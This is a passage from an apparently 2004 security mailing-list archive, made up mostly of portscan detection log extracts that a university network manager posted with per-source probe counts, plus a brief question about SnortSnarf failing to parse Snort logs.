Jul 3 19:47:48 83.129.127.41:23415 -> xxx.yyy.255.230:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:24136 -> xxx.yyy.255.226:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:21127 -> xxx.yyy.255.234:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:22792 -> xxx.yyy.255.241:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:24997 -> xxx.yyy.255.237:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:25285 -> xxx.yyy.255.246:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:23203 -> xxx.yyy.255.254:1433 SYN ******S* Jul 3 19:47:48 83.129.127.41:23673 -> xxx.yyy.255.250:1433 SYN ******S* 12037 Jul 3 12:25:01 210.202.16.36:4415 -> xxx.yyy.1.1:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:4427 -> xxx.yyy.1.3:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:4454 -> xxx.yyy.1.4:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:1492 -> xxx.yyy.1.9:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:3402 -> xxx.yyy.1.30:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:1492 -> xxx.yyy.1.31:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:3402 -> xxx.yyy.1.32:17300 SYN ******S* Jul 3 12:25:01 210.202.16.36:4415 -> xxx.yyy.1.33:17300 SYN ******S* [...] 
Jul 3 12:29:02 210.202.16.36:4417 -> xxx.yyy.254.72:17300 SYN ******S* Jul 3 12:29:02 210.202.16.36:4427 -> xxx.yyy.254.73:17300 SYN ******S* Jul 3 12:29:02 210.202.16.36:4479 -> xxx.yyy.254.74:17300 SYN ******S* Jul 3 12:29:03 210.202.16.36:1800 -> xxx.yyy.254.213:17300 SYN ******S* Jul 3 12:29:03 210.202.16.36:4251 -> xxx.yyy.254.214:17300 SYN ******S* Jul 3 12:29:03 210.202.16.36:4753 -> xxx.yyy.254.225:17300 SYN ******S* Jul 3 12:29:03 210.202.16.36:4850 -> xxx.yyy.254.226:17300 SYN ******S* Jul 3 12:29:03 210.202.16.36:4617 -> xxx.yyy.254.242:17300 SYN ******S* 10095 Jul 3 00:56:33 221.202.66.25:3724 -> xxx.yyy.72.161:5554 SYN ******S* Jul 3 00:56:34 221.202.66.25:4473 -> xxx.yyy.72.161:1023 SYN ******S* Jul 3 00:56:33 221.202.66.25:3761 -> xxx.yyy.72.160:5554 SYN ******S* Jul 3 00:56:34 221.202.66.25:4636 -> xxx.yyy.72.160:1023 SYN ******S* Jul 3 00:56:33 221.202.66.25:3765 -> xxx.yyy.72.159:5554 SYN ******S* Jul 3 00:56:34 221.202.66.25:4632 -> xxx.yyy.72.159:1023 SYN ******S* Jul 3 00:56:33 221.202.66.25:3767 -> xxx.yyy.72.158:5554 SYN ******S* Jul 3 00:56:34 221.202.66.25:4630 -> xxx.yyy.72.158:1023 SYN ******S* [...] Jul 3 00:57:23 221.202.66.25:4160 -> xxx.yyy.92.228:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4177 -> xxx.yyy.92.224:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4182 -> xxx.yyy.92.223:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4190 -> xxx.yyy.92.225:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4189 -> xxx.yyy.92.217:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4378 -> xxx.yyy.92.234:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4379 -> xxx.yyy.92.235:9898 SYN ******S* Jul 3 00:57:23 221.202.66.25:4381 -> xxx.yyy.92.236:9898 SYN ******S* 9358 [...] 
9109

Jul 3 00:56:46 221.201.144.137:1220 -> xxx.yyy.154.100:5554 SYN ******S*
Jul 3 00:56:47 221.201.144.137:1641 -> xxx.yyy.154.100:1023 SYN ******S*
Jul 3 00:56:46 221.201.144.137:1221 -> xxx.yyy.154.101:5554 SYN ******S*
Jul 3 00:56:47 221.201.144.137:1642 -> xxx.yyy.154.101:1023 SYN ******S*
Jul 3 00:56:46 221.201.144.137:1222 -> xxx.yyy.154.102:5554 SYN ******S*
Jul 3 00:56:47 221.201.144.137:1643 -> xxx.yyy.154.102:1023 SYN ******S*
Jul 3 00:56:46 221.201.144.137:1224 -> xxx.yyy.154.104:5554 SYN ******S*
Jul 3 00:56:47 221.201.144.137:1645 -> xxx.yyy.154.104:1023 SYN ******S*
[...]
Jul 3 00:57:35 221.201.144.137:1597 -> xxx.yyy.174.214:9898 SYN ******S*
Jul 3 00:57:35 221.201.144.137:1598 -> xxx.yyy.174.215:9898 SYN ******S*
Jul 3 00:57:35 221.201.144.137:1599 -> xxx.yyy.174.216:9898 SYN ******S*
Jul 3 00:57:35 221.201.144.137:1600 -> xxx.yyy.174.217:9898 SYN ******S*
Jul 3 00:57:35 221.201.144.137:1601 -> xxx.yyy.174.218:9898 SYN ******S*
Jul 3 00:57:35 221.201.144.137:1610 -> xxx.yyy.174.220:9898 SYN ******S*
Jul 3 00:57:35 221.201.144.137:1611 -> xxx.yyy.174.221:9898 SYN ******S*
Jul 3 00:57:35 221.201.144.137:1625 -> xxx.yyy.174.219:9898 SYN ******S*
Jul 3 00:57:35 221.201.144.137:1626 -> xxx.yyy.174.222:9898 SYN ******S*
9076

--
- Ken
===========================================================================
Ken Connelly (KC152)
Systems and Operations Manager, ITS - Network Services
University of Northern Iowa
Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu
phone: (319) 273-5850
fax: (319) 273-7373

From hackable at gmail.com Mon Jul 5 05:11:46 2004
From: hackable at gmail.com (Hack Able)
Date: Mon, 5 Jul 2004 01:11:46 -0400
Subject: [Intrusions] Snort and SnortSnarf
Message-ID:

Hello,

SnortSnarf gives me: "unknown alert format for line" for every line it sees in a snort log (fast, full, verbose, it doesn't matter). This seems to go for any snort log file, not just ones interpreted from isc.sans.org/logs/Raw/. Anyone else having this problem?
Snort 2.2.0RC1 (Build 28)
SnortSnarf version v021111.1

Josh

From Ken.Connelly at uni.edu Mon Jul 5 16:33:59 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Mon, 05 Jul 2004 11:33:59 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LC3N3B9T2C8YDM1V@uni.edu>

The following extracts show the beginning and ending of scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.

Jul 4 07:59:08 68.249.210.177:3885 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 4 07:59:08 68.249.210.177:3889 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 4 07:59:08 68.249.210.177:3890 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 4 07:59:10 68.249.210.177:3893 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 4 07:59:10 68.249.210.177:3896 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 4 07:59:10 68.249.210.177:3897 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 4 07:59:10 68.249.210.177:3898 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 4 07:59:10 68.249.210.177:3899 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jul 4 13:26:05 68.249.210.177:3804 -> xxx.yyy.255.247:8000 SYN ******S*
Jul 4 13:26:05 68.249.210.177:3805 -> xxx.yyy.255.248:8000 SYN ******S*
Jul 4 13:26:05 68.249.210.177:3806 -> xxx.yyy.255.249:8000 SYN ******S*
Jul 4 13:26:05 68.249.210.177:3808 -> xxx.yyy.255.250:8000 SYN ******S*
Jul 4 13:26:05 68.249.210.177:3810 -> xxx.yyy.255.251:8000 SYN ******S*
Jul 4 13:26:05 68.249.210.177:3811 -> xxx.yyy.255.252:8000 SYN ******S*
Jul 4 13:26:05 68.249.210.177:3812 -> xxx.yyy.255.253:8000 SYN ******S*
Jul 4 13:26:05 68.249.210.177:3813 -> xxx.yyy.255.254:8000 SYN ******S*
146640

Jul 4 16:36:42 64.53.45.117:1659 -> xxx.yyy.1.0:1433 SYN ******S*
Jul 4 16:36:42 64.53.45.117:1661 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 4 16:36:42 64.53.45.117:1663 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 4 16:36:42 64.53.45.117:1665 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 4 16:36:42 64.53.45.117:1669 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 4 16:36:42 64.53.45.117:1671 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 4 16:36:42 64.53.45.117:1673 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 4 16:36:42 64.53.45.117:1675 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 4 20:25:18 64.53.45.117:4483 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 4 20:25:18 64.53.45.117:4488 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 4 20:25:19 64.53.45.117:4493 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 4 20:25:19 64.53.45.117:4505 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 4 20:25:19 64.53.45.117:4537 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 4 20:25:19 64.53.45.117:4543 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 4 20:25:19 64.53.45.117:4552 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 4 20:25:19 64.53.45.117:4569 -> xxx.yyy.255.254:1433 SYN ******S*
122948

Jul 4 11:22:14 129.255.65.181:2141 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 4 11:22:14 129.255.65.181:2142 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 4 11:22:14 129.255.65.181:2143 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 4 11:22:16 129.255.65.181:2144 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 4 11:22:16 129.255.65.181:2145 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 4 11:22:16 129.255.65.181:2146 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 4 11:22:16 129.255.65.181:2147 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 4 11:22:16 129.255.65.181:2148 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jul 4 12:00:55 129.255.65.181:3860 -> xxx.yyy.255.247:8000 SYN ******S*
Jul 4 12:00:55 129.255.65.181:3861 -> xxx.yyy.255.248:8000 SYN ******S*
Jul 4 12:00:55 129.255.65.181:3862 -> xxx.yyy.255.249:8000 SYN ******S*
Jul 4 12:00:55 129.255.65.181:3863 -> xxx.yyy.255.250:8000 SYN ******S*
Jul 4 12:00:55 129.255.65.181:3864 -> xxx.yyy.255.251:8000 SYN ******S*
Jul 4 12:00:55 129.255.65.181:3865 -> xxx.yyy.255.252:8000 SYN ******S*
Jul 4 12:00:55 129.255.65.181:3866 -> xxx.yyy.255.253:8000 SYN ******S*
Jul 4 12:00:55 129.255.65.181:3867 -> xxx.yyy.255.254:8000 SYN ******S*
75549

Jul 4 20:02:28 139.142.206.101:4088 -> xxx.yyy.1.1:7575 SYN ******S*
Jul 4 20:02:28 139.142.206.101:4089 -> xxx.yyy.1.2:7575 SYN ******S*
Jul 4 20:02:28 139.142.206.101:4090 -> xxx.yyy.1.3:7575 SYN ******S*
Jul 4 20:02:30 139.142.206.101:4091 -> xxx.yyy.1.4:7575 SYN ******S*
Jul 4 20:02:30 139.142.206.101:4092 -> xxx.yyy.1.5:7575 SYN ******S*
Jul 4 20:02:30 139.142.206.101:4093 -> xxx.yyy.1.6:7575 SYN ******S*
Jul 4 20:02:30 139.142.206.101:4094 -> xxx.yyy.1.7:7575 SYN ******S*
Jul 4 20:02:30 139.142.206.101:4095 -> xxx.yyy.1.8:7575 SYN ******S*
[...]
Jul 4 20:13:23 139.142.206.101:3023 -> xxx.yyy.255.201:7575 SYN ******S*
Jul 4 20:13:23 139.142.206.101:3024 -> xxx.yyy.255.202:7575 SYN ******S*
Jul 4 20:13:23 139.142.206.101:3017 -> xxx.yyy.255.195:7575 SYN ******S*
Jul 4 20:13:23 139.142.206.101:3016 -> xxx.yyy.255.194:7575 SYN ******S*
Jul 4 20:13:23 139.142.206.101:3020 -> xxx.yyy.255.198:7575 SYN ******S*
Jul 4 20:13:23 139.142.206.101:3018 -> xxx.yyy.255.196:7575 SYN ******S*
Jul 4 20:13:23 139.142.206.101:3019 -> xxx.yyy.255.197:7575 SYN ******S*
Jul 4 20:13:24 139.142.206.101:3027 -> xxx.yyy.255.205:7575 SYN ******S*
Jul 4 20:13:24 139.142.206.101:3026 -> xxx.yyy.255.204:7575 SYN ******S*
73434

Jul 4 23:25:36 62.131.129.51:64955 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 4 23:25:37 62.131.129.51:64955 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 4 23:25:36 62.131.129.51:64955 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 4 23:25:37 62.131.129.51:64955 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 4 23:25:37 62.131.129.51:64955 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 4 23:25:34 62.131.129.51:64955 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 4 23:25:37 62.131.129.51:64955 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 4 23:25:37 62.131.129.51:64955 -> xxx.yyy.1.8:4899 SYN ******S*
[...]
Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.245:4899 SYN ******S*
Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.246:4899 SYN ******S*
Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.247:4899 SYN ******S*
Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.248:4899 SYN ******S*
Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.249:4899 SYN ******S*
Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.252:4899 SYN ******S*
Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.253:4899 SYN ******S*
Jul 4 23:37:16 62.131.129.51:64957 -> xxx.yyy.255.254:4899 SYN ******S*
72410

Jul 4 13:48:08 193.246.109.252:1576 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 4 13:48:08 193.246.109.252:1577 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 4 13:48:08 193.246.109.252:1578 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 4 13:48:08 193.246.109.252:1579 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 4 13:48:08 193.246.109.252:1580 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 4 13:48:08 193.246.109.252:1581 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 4 13:48:08 193.246.109.252:1582 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 4 13:48:05 193.246.109.252:1583 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 4 13:59:58 193.246.109.252:1753 -> xxx.yyy.255.173:1433 SYN ******S*
Jul 4 13:59:58 193.246.109.252:1757 -> xxx.yyy.255.177:1433 SYN ******S*
Jul 4 13:59:58 193.246.109.252:1750 -> xxx.yyy.255.170:1433 SYN ******S*
Jul 4 13:59:58 193.246.109.252:1754 -> xxx.yyy.255.174:1433 SYN ******S*
Jul 4 13:59:58 193.246.109.252:1755 -> xxx.yyy.255.175:1433 SYN ******S*
Jul 4 13:59:58 193.246.109.252:1760 -> xxx.yyy.255.180:1433 SYN ******S*
Jul 4 13:59:58 193.246.109.252:1762 -> xxx.yyy.255.182:1433 SYN ******S*
Jul 4 13:59:58 193.246.109.252:1759 -> xxx.yyy.255.179:1433 SYN ******S*
Jul 4 13:59:58 193.246.109.252:1761 -> xxx.yyy.255.181:1433 SYN ******S*
71475

Jul 4 17:32:29 82.43.182.113:3681 -> xxx.yyy.1.0:1433 SYN ******S*
Jul 4 17:32:29 82.43.182.113:3685 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 4 17:32:29 82.43.182.113:3683 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 4 17:32:29 82.43.182.113:3690 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 4 17:32:29 82.43.182.113:3691 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 4 17:32:29 82.43.182.113:3705 -> xxx.yyy.1.16:1433 SYN ******S*
Jul 4 17:32:29 82.43.182.113:3706 -> xxx.yyy.1.17:1433 SYN ******S*
Jul 4 17:32:29 82.43.182.113:3709 -> xxx.yyy.1.18:1433 SYN ******S*
[...]
Jul 4 20:13:09 82.43.182.113:3218 -> xxx.yyy.180.25:1433 SYN ******S*
Jul 4 20:13:09 82.43.182.113:3217 -> xxx.yyy.180.24:1433 SYN ******S*
Jul 4 20:13:11 82.43.182.113:3555 -> xxx.yyy.180.26:1433 SYN ******S*
Jul 4 20:13:12 82.43.182.113:3556 -> xxx.yyy.180.27:1433 SYN ******S*
Jul 4 20:13:12 82.43.182.113:3558 -> xxx.yyy.180.28:1433 SYN ******S*
Jul 4 20:13:12 82.43.182.113:3559 -> xxx.yyy.180.29:1433 SYN ******S*
Jul 4 20:13:12 82.43.182.113:3561 -> xxx.yyy.180.30:1433 SYN ******S*
Jul 4 20:13:13 82.43.182.113:3562 -> xxx.yyy.180.31:1433 SYN ******S*
Jul 4 20:13:13 82.43.182.113:3576 -> xxx.yyy.180.32:1433 SYN ******S*
68830

Jul 4 15:36:27 217.231.62.55:61681 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 4 15:36:27 217.231.62.55:62459 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 4 15:36:27 217.231.62.55:63799 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 4 15:36:27 217.231.62.55:62519 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 4 15:36:24 217.231.62.55:62487 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 4 15:36:27 217.231.62.55:64967 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 4 15:36:27 217.231.62.55:62829 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 4 15:36:27 217.231.62.55:65117 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 4 15:59:16 217.231.62.55:64993 -> xxx.yyy.255.194:1433 SYN ******S*
Jul 4 15:59:16 217.231.62.55:63353 -> xxx.yyy.255.199:1433 SYN ******S*
Jul 4 15:59:16 217.231.62.55:63479 -> xxx.yyy.255.208:1433 SYN ******S*
Jul 4 15:59:16 217.231.62.55:62087 -> xxx.yyy.255.209:1433 SYN ******S*
Jul 4 15:59:16 217.231.62.55:64089 -> xxx.yyy.255.214:1433 SYN ******S*
Jul 4 15:59:16 217.231.62.55:63657 -> xxx.yyy.255.215:1433 SYN ******S*
Jul 4 15:59:16 217.231.62.55:63777 -> xxx.yyy.255.216:1433 SYN ******S*
Jul 4 15:59:16 217.231.62.55:63659 -> xxx.yyy.255.217:1433 SYN ******S*
42906

Jul 4 21:49:05 82.33.67.40:1754 -> xxx.yyy.1.0:1433 SYN ******S*
Jul 4 21:49:05 82.33.67.40:1756 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 4 21:49:05 82.33.67.40:1758 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 4 21:49:05 82.33.67.40:1762 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 4 21:49:05 82.33.67.40:1761 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 4 21:49:05 82.33.67.40:1763 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 4 21:49:05 82.33.67.40:1764 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 4 21:49:05 82.33.67.40:1766 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jul 4 23:59:57 82.33.67.40:1785 -> xxx.yyy.146.231:1433 SYN ******S*
Jul 4 23:59:57 82.33.67.40:1789 -> xxx.yyy.146.232:1433 SYN ******S*
Jul 4 23:59:58 82.33.67.40:1791 -> xxx.yyy.146.233:1433 SYN ******S*
Jul 4 23:59:58 82.33.67.40:1796 -> xxx.yyy.146.234:1433 SYN ******S*
Jul 4 23:59:58 82.33.67.40:1800 -> xxx.yyy.146.235:1433 SYN ******S*
Jul 4 23:59:58 82.33.67.40:1801 -> xxx.yyy.146.236:1433 SYN ******S*
Jul 4 23:59:58 82.33.67.40:1802 -> xxx.yyy.146.237:1433 SYN ******S*
Jul 4 23:59:58 82.33.67.40:1746 -> xxx.yyy.146.229:1433 SYN ******S*
Jul 4 23:59:58 82.33.67.40:1806 -> xxx.yyy.146.238:1433 SYN ******S*
41922

Jul 4 12:23:30 165.21.71.194:46647 -> xxx.yyy.1.0:111 SYN ******S*
Jul 4 12:23:30 165.21.71.194:46648 -> xxx.yyy.1.1:111 SYN ******S*
Jul 4 12:23:30 165.21.71.194:46649 -> xxx.yyy.1.2:111 SYN ******S*
Jul 4 12:23:30 165.21.71.194:46652 -> xxx.yyy.1.5:111 SYN ******S*
Jul 4 12:23:30 165.21.71.194:46654 -> xxx.yyy.1.7:111 SYN ******S*
Jul 4 12:23:30 165.21.71.194:46660 -> xxx.yyy.1.13:111 SYN ******S*
Jul 4 12:23:30 165.21.71.194:46665 -> xxx.yyy.1.18:111 SYN ******S*
Jul 4 12:23:30 165.21.71.194:46666 -> xxx.yyy.1.19:111 SYN ******S*
[...]
Jul 4 12:34:20 165.21.71.194:46228 -> xxx.yyy.255.254:111 SYN ******S*
Jul 4 12:34:20 165.21.71.194:46216 -> xxx.yyy.255.242:111 SYN ******S*
Jul 4 12:34:20 165.21.71.194:46219 -> xxx.yyy.255.245:111 SYN ******S*
Jul 4 12:34:20 165.21.71.194:46220 -> xxx.yyy.255.246:111 SYN ******S*
Jul 4 12:34:20 165.21.71.194:46222 -> xxx.yyy.255.248:111 SYN ******S*
Jul 4 12:34:20 165.21.71.194:46223 -> xxx.yyy.255.249:111 SYN ******S*
Jul 4 12:34:20 165.21.71.194:46225 -> xxx.yyy.255.251:111 SYN ******S*
Jul 4 12:34:20 165.21.71.194:46226 -> xxx.yyy.255.252:111 SYN ******S*
Jul 4 12:34:20 165.21.71.194:46227 -> xxx.yyy.255.253:111 SYN ******S*
39426

Jul 4 20:47:06 211.110.155.221:3207 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 4 20:47:06 211.110.155.221:3208 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 4 20:47:06 211.110.155.221:3209 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 4 20:47:06 211.110.155.221:3210 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 4 20:47:06 211.110.155.221:3211 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 4 20:47:06 211.110.155.221:3212 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 4 20:47:06 211.110.155.221:3213 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 4 20:47:06 211.110.155.221:3215 -> xxx.yyy.1.9:4899 SYN ******S*
[...]
Jul 4 20:52:32 211.110.155.221:3422 -> xxx.yyy.254.138:4899 SYN ******S*
Jul 4 20:52:32 211.110.155.221:3403 -> xxx.yyy.254.119:4899 SYN ******S*
Jul 4 20:52:32 211.110.155.221:3419 -> xxx.yyy.254.135:4899 SYN ******S*
Jul 4 20:52:32 211.110.155.221:3432 -> xxx.yyy.254.148:4899 SYN ******S*
Jul 4 20:52:32 211.110.155.221:3396 -> xxx.yyy.254.113:4899 SYN ******S*
Jul 4 20:52:32 211.110.155.221:3400 -> xxx.yyy.254.116:4899 SYN ******S*
Jul 4 20:52:32 211.110.155.221:3416 -> xxx.yyy.254.132:4899 SYN ******S*
Jul 4 20:52:32 211.110.155.221:3413 -> xxx.yyy.254.129:4899 SYN ******S*
Jul 4 20:52:32 211.110.155.221:3429 -> xxx.yyy.254.145:4899 SYN ******S*
26279

Jul 4 23:05:52 218.107.144.98:3421 -> xxx.yyy.1.0:901 SYN ******S*
Jul 4 23:05:52 218.107.144.98:3422 -> xxx.yyy.1.1:901 SYN ******S*
Jul 4 23:05:52 218.107.144.98:3423 -> xxx.yyy.1.2:901 SYN ******S*
Jul 4 23:05:52 218.107.144.98:3424 -> xxx.yyy.1.3:901 SYN ******S*
Jul 4 23:05:54 218.107.144.98:3425 -> xxx.yyy.1.4:901 SYN ******S*
Jul 4 23:05:54 218.107.144.98:3426 -> xxx.yyy.1.5:901 SYN ******S*
Jul 4 23:05:54 218.107.144.98:3427 -> xxx.yyy.1.6:901 SYN ******S*
Jul 4 23:05:54 218.107.144.98:3428 -> xxx.yyy.1.7:901 SYN ******S*
[...]
Jul 4 23:54:48 218.107.144.98:4532 -> xxx.yyy.111.246:901 SYN ******S*
Jul 4 23:54:48 218.107.144.98:4529 -> xxx.yyy.111.243:901 SYN ******S*
Jul 4 23:54:48 218.107.144.98:4539 -> xxx.yyy.111.253:901 SYN ******S*
Jul 4 23:54:48 218.107.144.98:4536 -> xxx.yyy.111.250:901 SYN ******S*
Jul 4 23:54:48 218.107.144.98:4533 -> xxx.yyy.111.247:901 SYN ******S*
Jul 4 23:54:48 218.107.144.98:4530 -> xxx.yyy.111.244:901 SYN ******S*
Jul 4 23:54:48 218.107.144.98:4540 -> xxx.yyy.111.254:901 SYN ******S*
Jul 4 23:54:48 218.107.144.98:4537 -> xxx.yyy.111.251:901 SYN ******S*
Jul 4 23:54:48 218.107.144.98:4534 -> xxx.yyy.111.248:901 SYN ******S*
21259

Jul 4 10:55:31 82.36.73.139:3802 -> xxx.yyy.1.11:1433 SYN ******S*
Jul 4 10:55:31 82.36.73.139:3975 -> xxx.yyy.1.22:1433 SYN ******S*
Jul 4 10:55:31 82.36.73.139:4039 -> xxx.yyy.1.23:1433 SYN ******S*
Jul 4 10:55:31 82.36.73.139:4360 -> xxx.yyy.1.28:1433 SYN ******S*
Jul 4 10:55:31 82.36.73.139:4417 -> xxx.yyy.1.30:1433 SYN ******S*
Jul 4 10:55:31 82.36.73.139:4699 -> xxx.yyy.1.33:1433 SYN ******S*
Jul 4 10:55:34 82.36.73.139:4796 -> xxx.yyy.1.35:1433 SYN ******S*
Jul 4 10:55:31 82.36.73.139:4822 -> xxx.yyy.1.38:1433 SYN ******S*
[...]
Jul 4 12:09:28 82.36.73.139:4797 -> xxx.yyy.83.116:1433 SYN ******S*
Jul 4 12:09:28 82.36.73.139:4811 -> xxx.yyy.83.117:1433 SYN ******S*
Jul 4 12:09:28 82.36.73.139:3450 -> xxx.yyy.83.44:1433 SYN ******S*
Jul 4 12:09:28 82.36.73.139:4940 -> xxx.yyy.83.118:1433 SYN ******S*
Jul 4 12:09:28 82.36.73.139:4967 -> xxx.yyy.83.119:1433 SYN ******S*
Jul 4 12:09:28 82.36.73.139:3006 -> xxx.yyy.83.120:1433 SYN ******S*
Jul 4 12:09:28 82.36.73.139:3009 -> xxx.yyy.83.121:1433 SYN ******S*
Jul 4 12:09:28 82.36.73.139:3011 -> xxx.yyy.83.122:1433 SYN ******S*
Jul 4 12:09:28 82.36.73.139:3015 -> xxx.yyy.83.123:1433 SYN ******S*
18182

Jul 4 23:55:33 220.108.227.188:1486 -> xxx.yyy.214.246:5554 SYN ******S*
Jul 4 23:55:34 220.108.227.188:1726 -> xxx.yyy.214.246:1023 SYN ******S*
Jul 4 23:55:36 220.108.227.188:2177 -> xxx.yyy.214.246:9898 SYN ******S*
Jul 4 23:55:33 220.108.227.188:1491 -> xxx.yyy.214.247:5554 SYN ******S*
Jul 4 23:55:34 220.108.227.188:1733 -> xxx.yyy.214.247:1023 SYN ******S*
Jul 4 23:55:36 220.108.227.188:2180 -> xxx.yyy.214.247:9898 SYN ******S*
Jul 4 23:55:33 220.108.227.188:1502 -> xxx.yyy.214.249:5554 SYN ******S*
Jul 4 23:55:34 220.108.227.188:1742 -> xxx.yyy.214.249:1023 SYN ******S*
[...]
Jul 4 23:57:05 220.108.227.188:4730 -> xxx.yyy.235.103:9898 SYN ******S*
Jul 4 23:57:05 220.108.227.188:4782 -> xxx.yyy.235.110:9898 SYN ******S*
Jul 4 23:57:05 220.108.227.188:4800 -> xxx.yyy.235.106:9898 SYN ******S*
Jul 4 23:57:05 220.108.227.188:4801 -> xxx.yyy.235.107:9898 SYN ******S*
Jul 4 23:57:05 220.108.227.188:4799 -> xxx.yyy.235.105:9898 SYN ******S*
Jul 4 23:57:05 220.108.227.188:4802 -> xxx.yyy.235.108:9898 SYN ******S*
Jul 4 23:57:05 220.108.227.188:4804 -> xxx.yyy.235.109:9898 SYN ******S*
Jul 4 23:57:05 220.108.227.188:4820 -> xxx.yyy.235.111:9898 SYN ******S*
Jul 4 23:57:05 220.108.227.188:4854 -> xxx.yyy.235.112:9898 SYN ******S*
15079

Jul 4 00:56:23 61.138.108.243:3843 -> xxx.yyy.174.2:5554 SYN ******S*
Jul 4 00:56:24 61.138.108.243:4314 -> xxx.yyy.174.2:1023 SYN ******S*
Jul 4 00:56:26 61.138.108.243:1390 -> xxx.yyy.174.2:9898 SYN ******S*
Jul 4 00:56:23 61.138.108.243:3876 -> xxx.yyy.174.3:5554 SYN ******S*
Jul 4 00:56:24 61.138.108.243:4325 -> xxx.yyy.174.3:1023 SYN ******S*
Jul 4 00:56:26 61.138.108.243:1404 -> xxx.yyy.174.3:9898 SYN ******S*
Jul 4 00:56:23 61.138.108.243:3889 -> xxx.yyy.174.4:5554 SYN ******S*
Jul 4 00:56:24 61.138.108.243:4330 -> xxx.yyy.174.4:1023 SYN ******S*
[...]
Jul 4 00:58:29 61.138.108.243:3433 -> xxx.yyy.194.85:9898 SYN ******S*
